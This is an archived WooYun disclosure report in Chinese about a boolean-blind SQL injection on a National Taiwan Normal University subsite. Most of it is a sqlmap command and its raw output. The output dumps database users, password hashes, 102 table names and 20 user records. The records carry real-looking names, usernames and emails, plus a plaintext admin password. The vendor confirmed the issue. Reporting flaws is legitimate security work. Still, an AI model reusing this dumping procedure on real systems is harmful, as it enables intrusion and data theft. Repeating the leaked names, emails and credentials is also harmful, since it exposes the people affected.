乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-24: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
台湾国立师范大学某分站存在SQL注射漏洞(DBA权限/root密码泄露/102个表/大量用户姓名密码邮箱等信息泄露)
测试地址:http://**.**.**.**/news/index.php?mode=data&id=15434
python sqlmap.py -u "http://**.**.**.**/news/index.php?mode=data&id=15434" -p id --technique=B --threads=10 -D ntnu_relations -T imw_users -C id,name,username,password,email --dump --threads=10
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mode=data&id=15434 AND 2269=2269---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: PHP 5.2.10, Apache 2.2.3back-end DBMS: MySQL 5current user: 'root@localhost'current user is DBA: Truedatabase management system users [14]:[*] ''@'%.%.%.%'[*] ''@'localhost'[*] ''@'**.**.**.**'[*] 'cherry'@'**.**.**.**'[*] 'new_account_name'@'IP'[*] 'ntnu_relations'@'%'[*] 'root'@'%'[*] 'root'@'**.**.**.**'[*] 'root'@'**.**.**.**'[*] 'root'@'**.**.**.**'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'[*] 'root'@'**.**.**.**'[*] 'server'@'%'sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mode=data&id=15434 AND 2269=2269---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: PHP 5.2.10, Apache 2.2.3back-end DBMS: MySQL 5database management system users password hashes:[*] cherry [1]: password hash: 5bd98292340f26b2[*] new_account_name [1]: password hash: *B2764B84A314D7C9474F3B047AFDBB6831B280EC[*] ntnu_relations [1]: password hash: 1623fcbe5a9e6c91[*] root [1]: password hash: 273a3d200da09c3e[*] server [1]: password hash: 44594b463a4bd1d4sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mode=data&id=15434 AND 2269=2269---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: PHP 5.2.10, Apache 2.2.3back-end DBMS: MySQL 5available databases [4]:[*] information_schema[*] mysql[*] ntnu_relations[*] testsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mode=data&id=15434 AND 2269=2269---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: PHP 5.2.10, Apache 2.2.3back-end DBMS: MySQL 5sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mode=data&id=15434 AND 2269=2269---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: PHP 5.2.10, Apache 2.2.3back-end DBMS: MySQL 5Database: ntnu_relations[102 tables]+---------------------------------+| _imw_statistice_visitors_bk0625 || imw_alumni_subcriber || imw_activitise || imw_activitise_type || imw_ad || imw_ad_link || imw_ad_type || imw_adbig || imw_alumni || imw_alumni_log || imw_alumni_queue || imw_alumni_result || imw_alumni_subscriber_type || imw_alumni_type || imw_contact_us || imw_contact_us_send_log || imw_content || imw_course || imw_course_tmp || imw_course_type || imw_course_type_tmp || imw_department || imw_download || imw_download_type || imw_en_news || imw_en_news_type || imw_epapers || imw_epapers_log || imw_epapers_media_type || imw_epapers_queue || imw_epapers_result || imw_epapers_subscriber || imw_epapers_subscriber_type || imw_epapers_type || imw_files || imw_files_link || imw_film || imw_film_type || imw_gallery_album || imw_gallery_album_charts || imw_gallery_type || imw_help || imw_honor || imw_honor_type || imw_inf || imw_inf_type || imw_information || imw_information_type || imw_keywords || imw_keywords_type || imw_motto || imw_motto_type || imw_news || imw_news_type || imw_newspaper || imw_newspaper_type || imw_newsstations || imw_newsstations_type || imw_note || imw_notes || imw_notes_type || imw_organizers_type || imw_payment || imw_payment_shipment_link || imw_politics || imw_politics_type || imw_reporter || imw_reporter_type || imw_return_goods || imw_return_goods_main || imw_searchbot || imw_sessions || imw_shipment || imw_sodality || imw_sodality_type || imw_statistics_ad || imw_statistics_agent || imw_statistics_functions || imw_statistics_login_history || imw_statistics_visitors || imw_system_setting || imw_themes || imw_users || imw_users_type || imw_web_content || imw_weekly || imw_weekly_activities || imw_weekly_activitise_type || imw_weekly_epapers || imw_weekly_log || imw_weekly_news || imw_weekly_newspaper || imw_weekly_queue || imw_weekly_result || imw_weekly_subscriber || imw_weekly_subscriber_type || imw_weekly_temp || imw_weekly_type || ip2nation || ip2nationcountries || news || pubpaper |+---------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mode=data&id=15434 AND 2269=2269---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: PHP 5.2.10, Apache 2.2.3back-end DBMS: MySQL 5Database: ntnu_relationsTable: imw_users[12 columns]+------------------+-------------------+| Column | Type |+------------------+-------------------+| company_name | varchar(255) || email | varchar(255) || id | int(10) || idnumber | varchar(20) || name | varchar(255) || name_alias | varchar(255) || password | varchar(100) || person_in_charge | varchar(255) || portrait | varchar(255) || sex | eaum('0',!??????? || type_id | int(10) || username | varchar(100) |+------------------+-------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mode=data&id=15434 AND 2269=2269---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: PHP 5.2.10, Apache 2.2.3back-end DBMS: MySQL 5Database: ntnu_relations+-----------+---------+| Table | Entries |+-----------+---------+| imw_users | 890 |+-----------+---------+
选取其中前20证明危害即可:
back-end DBMS: MySQL 5Database: ntnu_relationsTable: imw_users[20 entries]+----+-------+-----------+----------+-----------------------+| id | name | username | password | email |+----+-------+-----------+----------+-----------------------+| 1 | 網站管理員 | root | 8yvc8lwg | pr@**.**.**.** || 9 | 胡世澤 | abow722 | <blank> | <blank> || 18 | 許睿芸 | julia_hsu | <blank> | julia_hsu@**.**.**.** || 19 | 徐秉琦 | vickyhsu | <blank> | vickyhsu@**.**.**.** || 20 | 高振楠 | necford | <blank> | necford@**.**.**.** || 21 | 李東穎 | dong122 | <blank> | dong122@**.**.**.** || 22 | 黃培娪 | t1101 | <blank> | t1101@**.**.**.** || 23 | 李玉雲 | yiyun | <blank> | yiyun@**.**.**.** || 24 | 趙奕翔 | eshozhao | <blank> | eshozhao@**.**.**.** || 25 | 黃心瑜 | shinyu688 | <blank> | shinyu688@**.**.**.** || 26 | 蔡佳芳 | alicetsai | <blank> | alicetsai@**.**.**.** || 27 | 劉純妤 | polly-l | <blank> | polly-l@**.**.**.** || 28 | 陳經緯 | ch888 | <blank> | ch888@**.**.**.** || 29 | 蘇昭銘 | oinzuka | <blank> | oinzuka@**.**.**.** || 30 | 王慕涵 | muhan | <blank> | muhan@**.**.**.** || 31 | 汪淑慧 | shwang.tn | <blank> | shwang.tn@**.**.**.** || 32 | 江姿儀 | tzuyi | <blank> | tzuyi@**.**.**.** || 33 | 何佳蓉 | sarahho15 | <blank> | sarahho15@**.**.**.** || 34 | 張翊威 | punurvasu | <blank> | punurvasu@**.**.**.** || 35 | 張育甄 | anains | <blank> | anains@**.**.**.** |+----+-------+-----------+----------+-----------------------+
增加过滤。
危害等级:高
漏洞Rank:19
确认时间:2015-10-26 23:27
感謝通報
暂无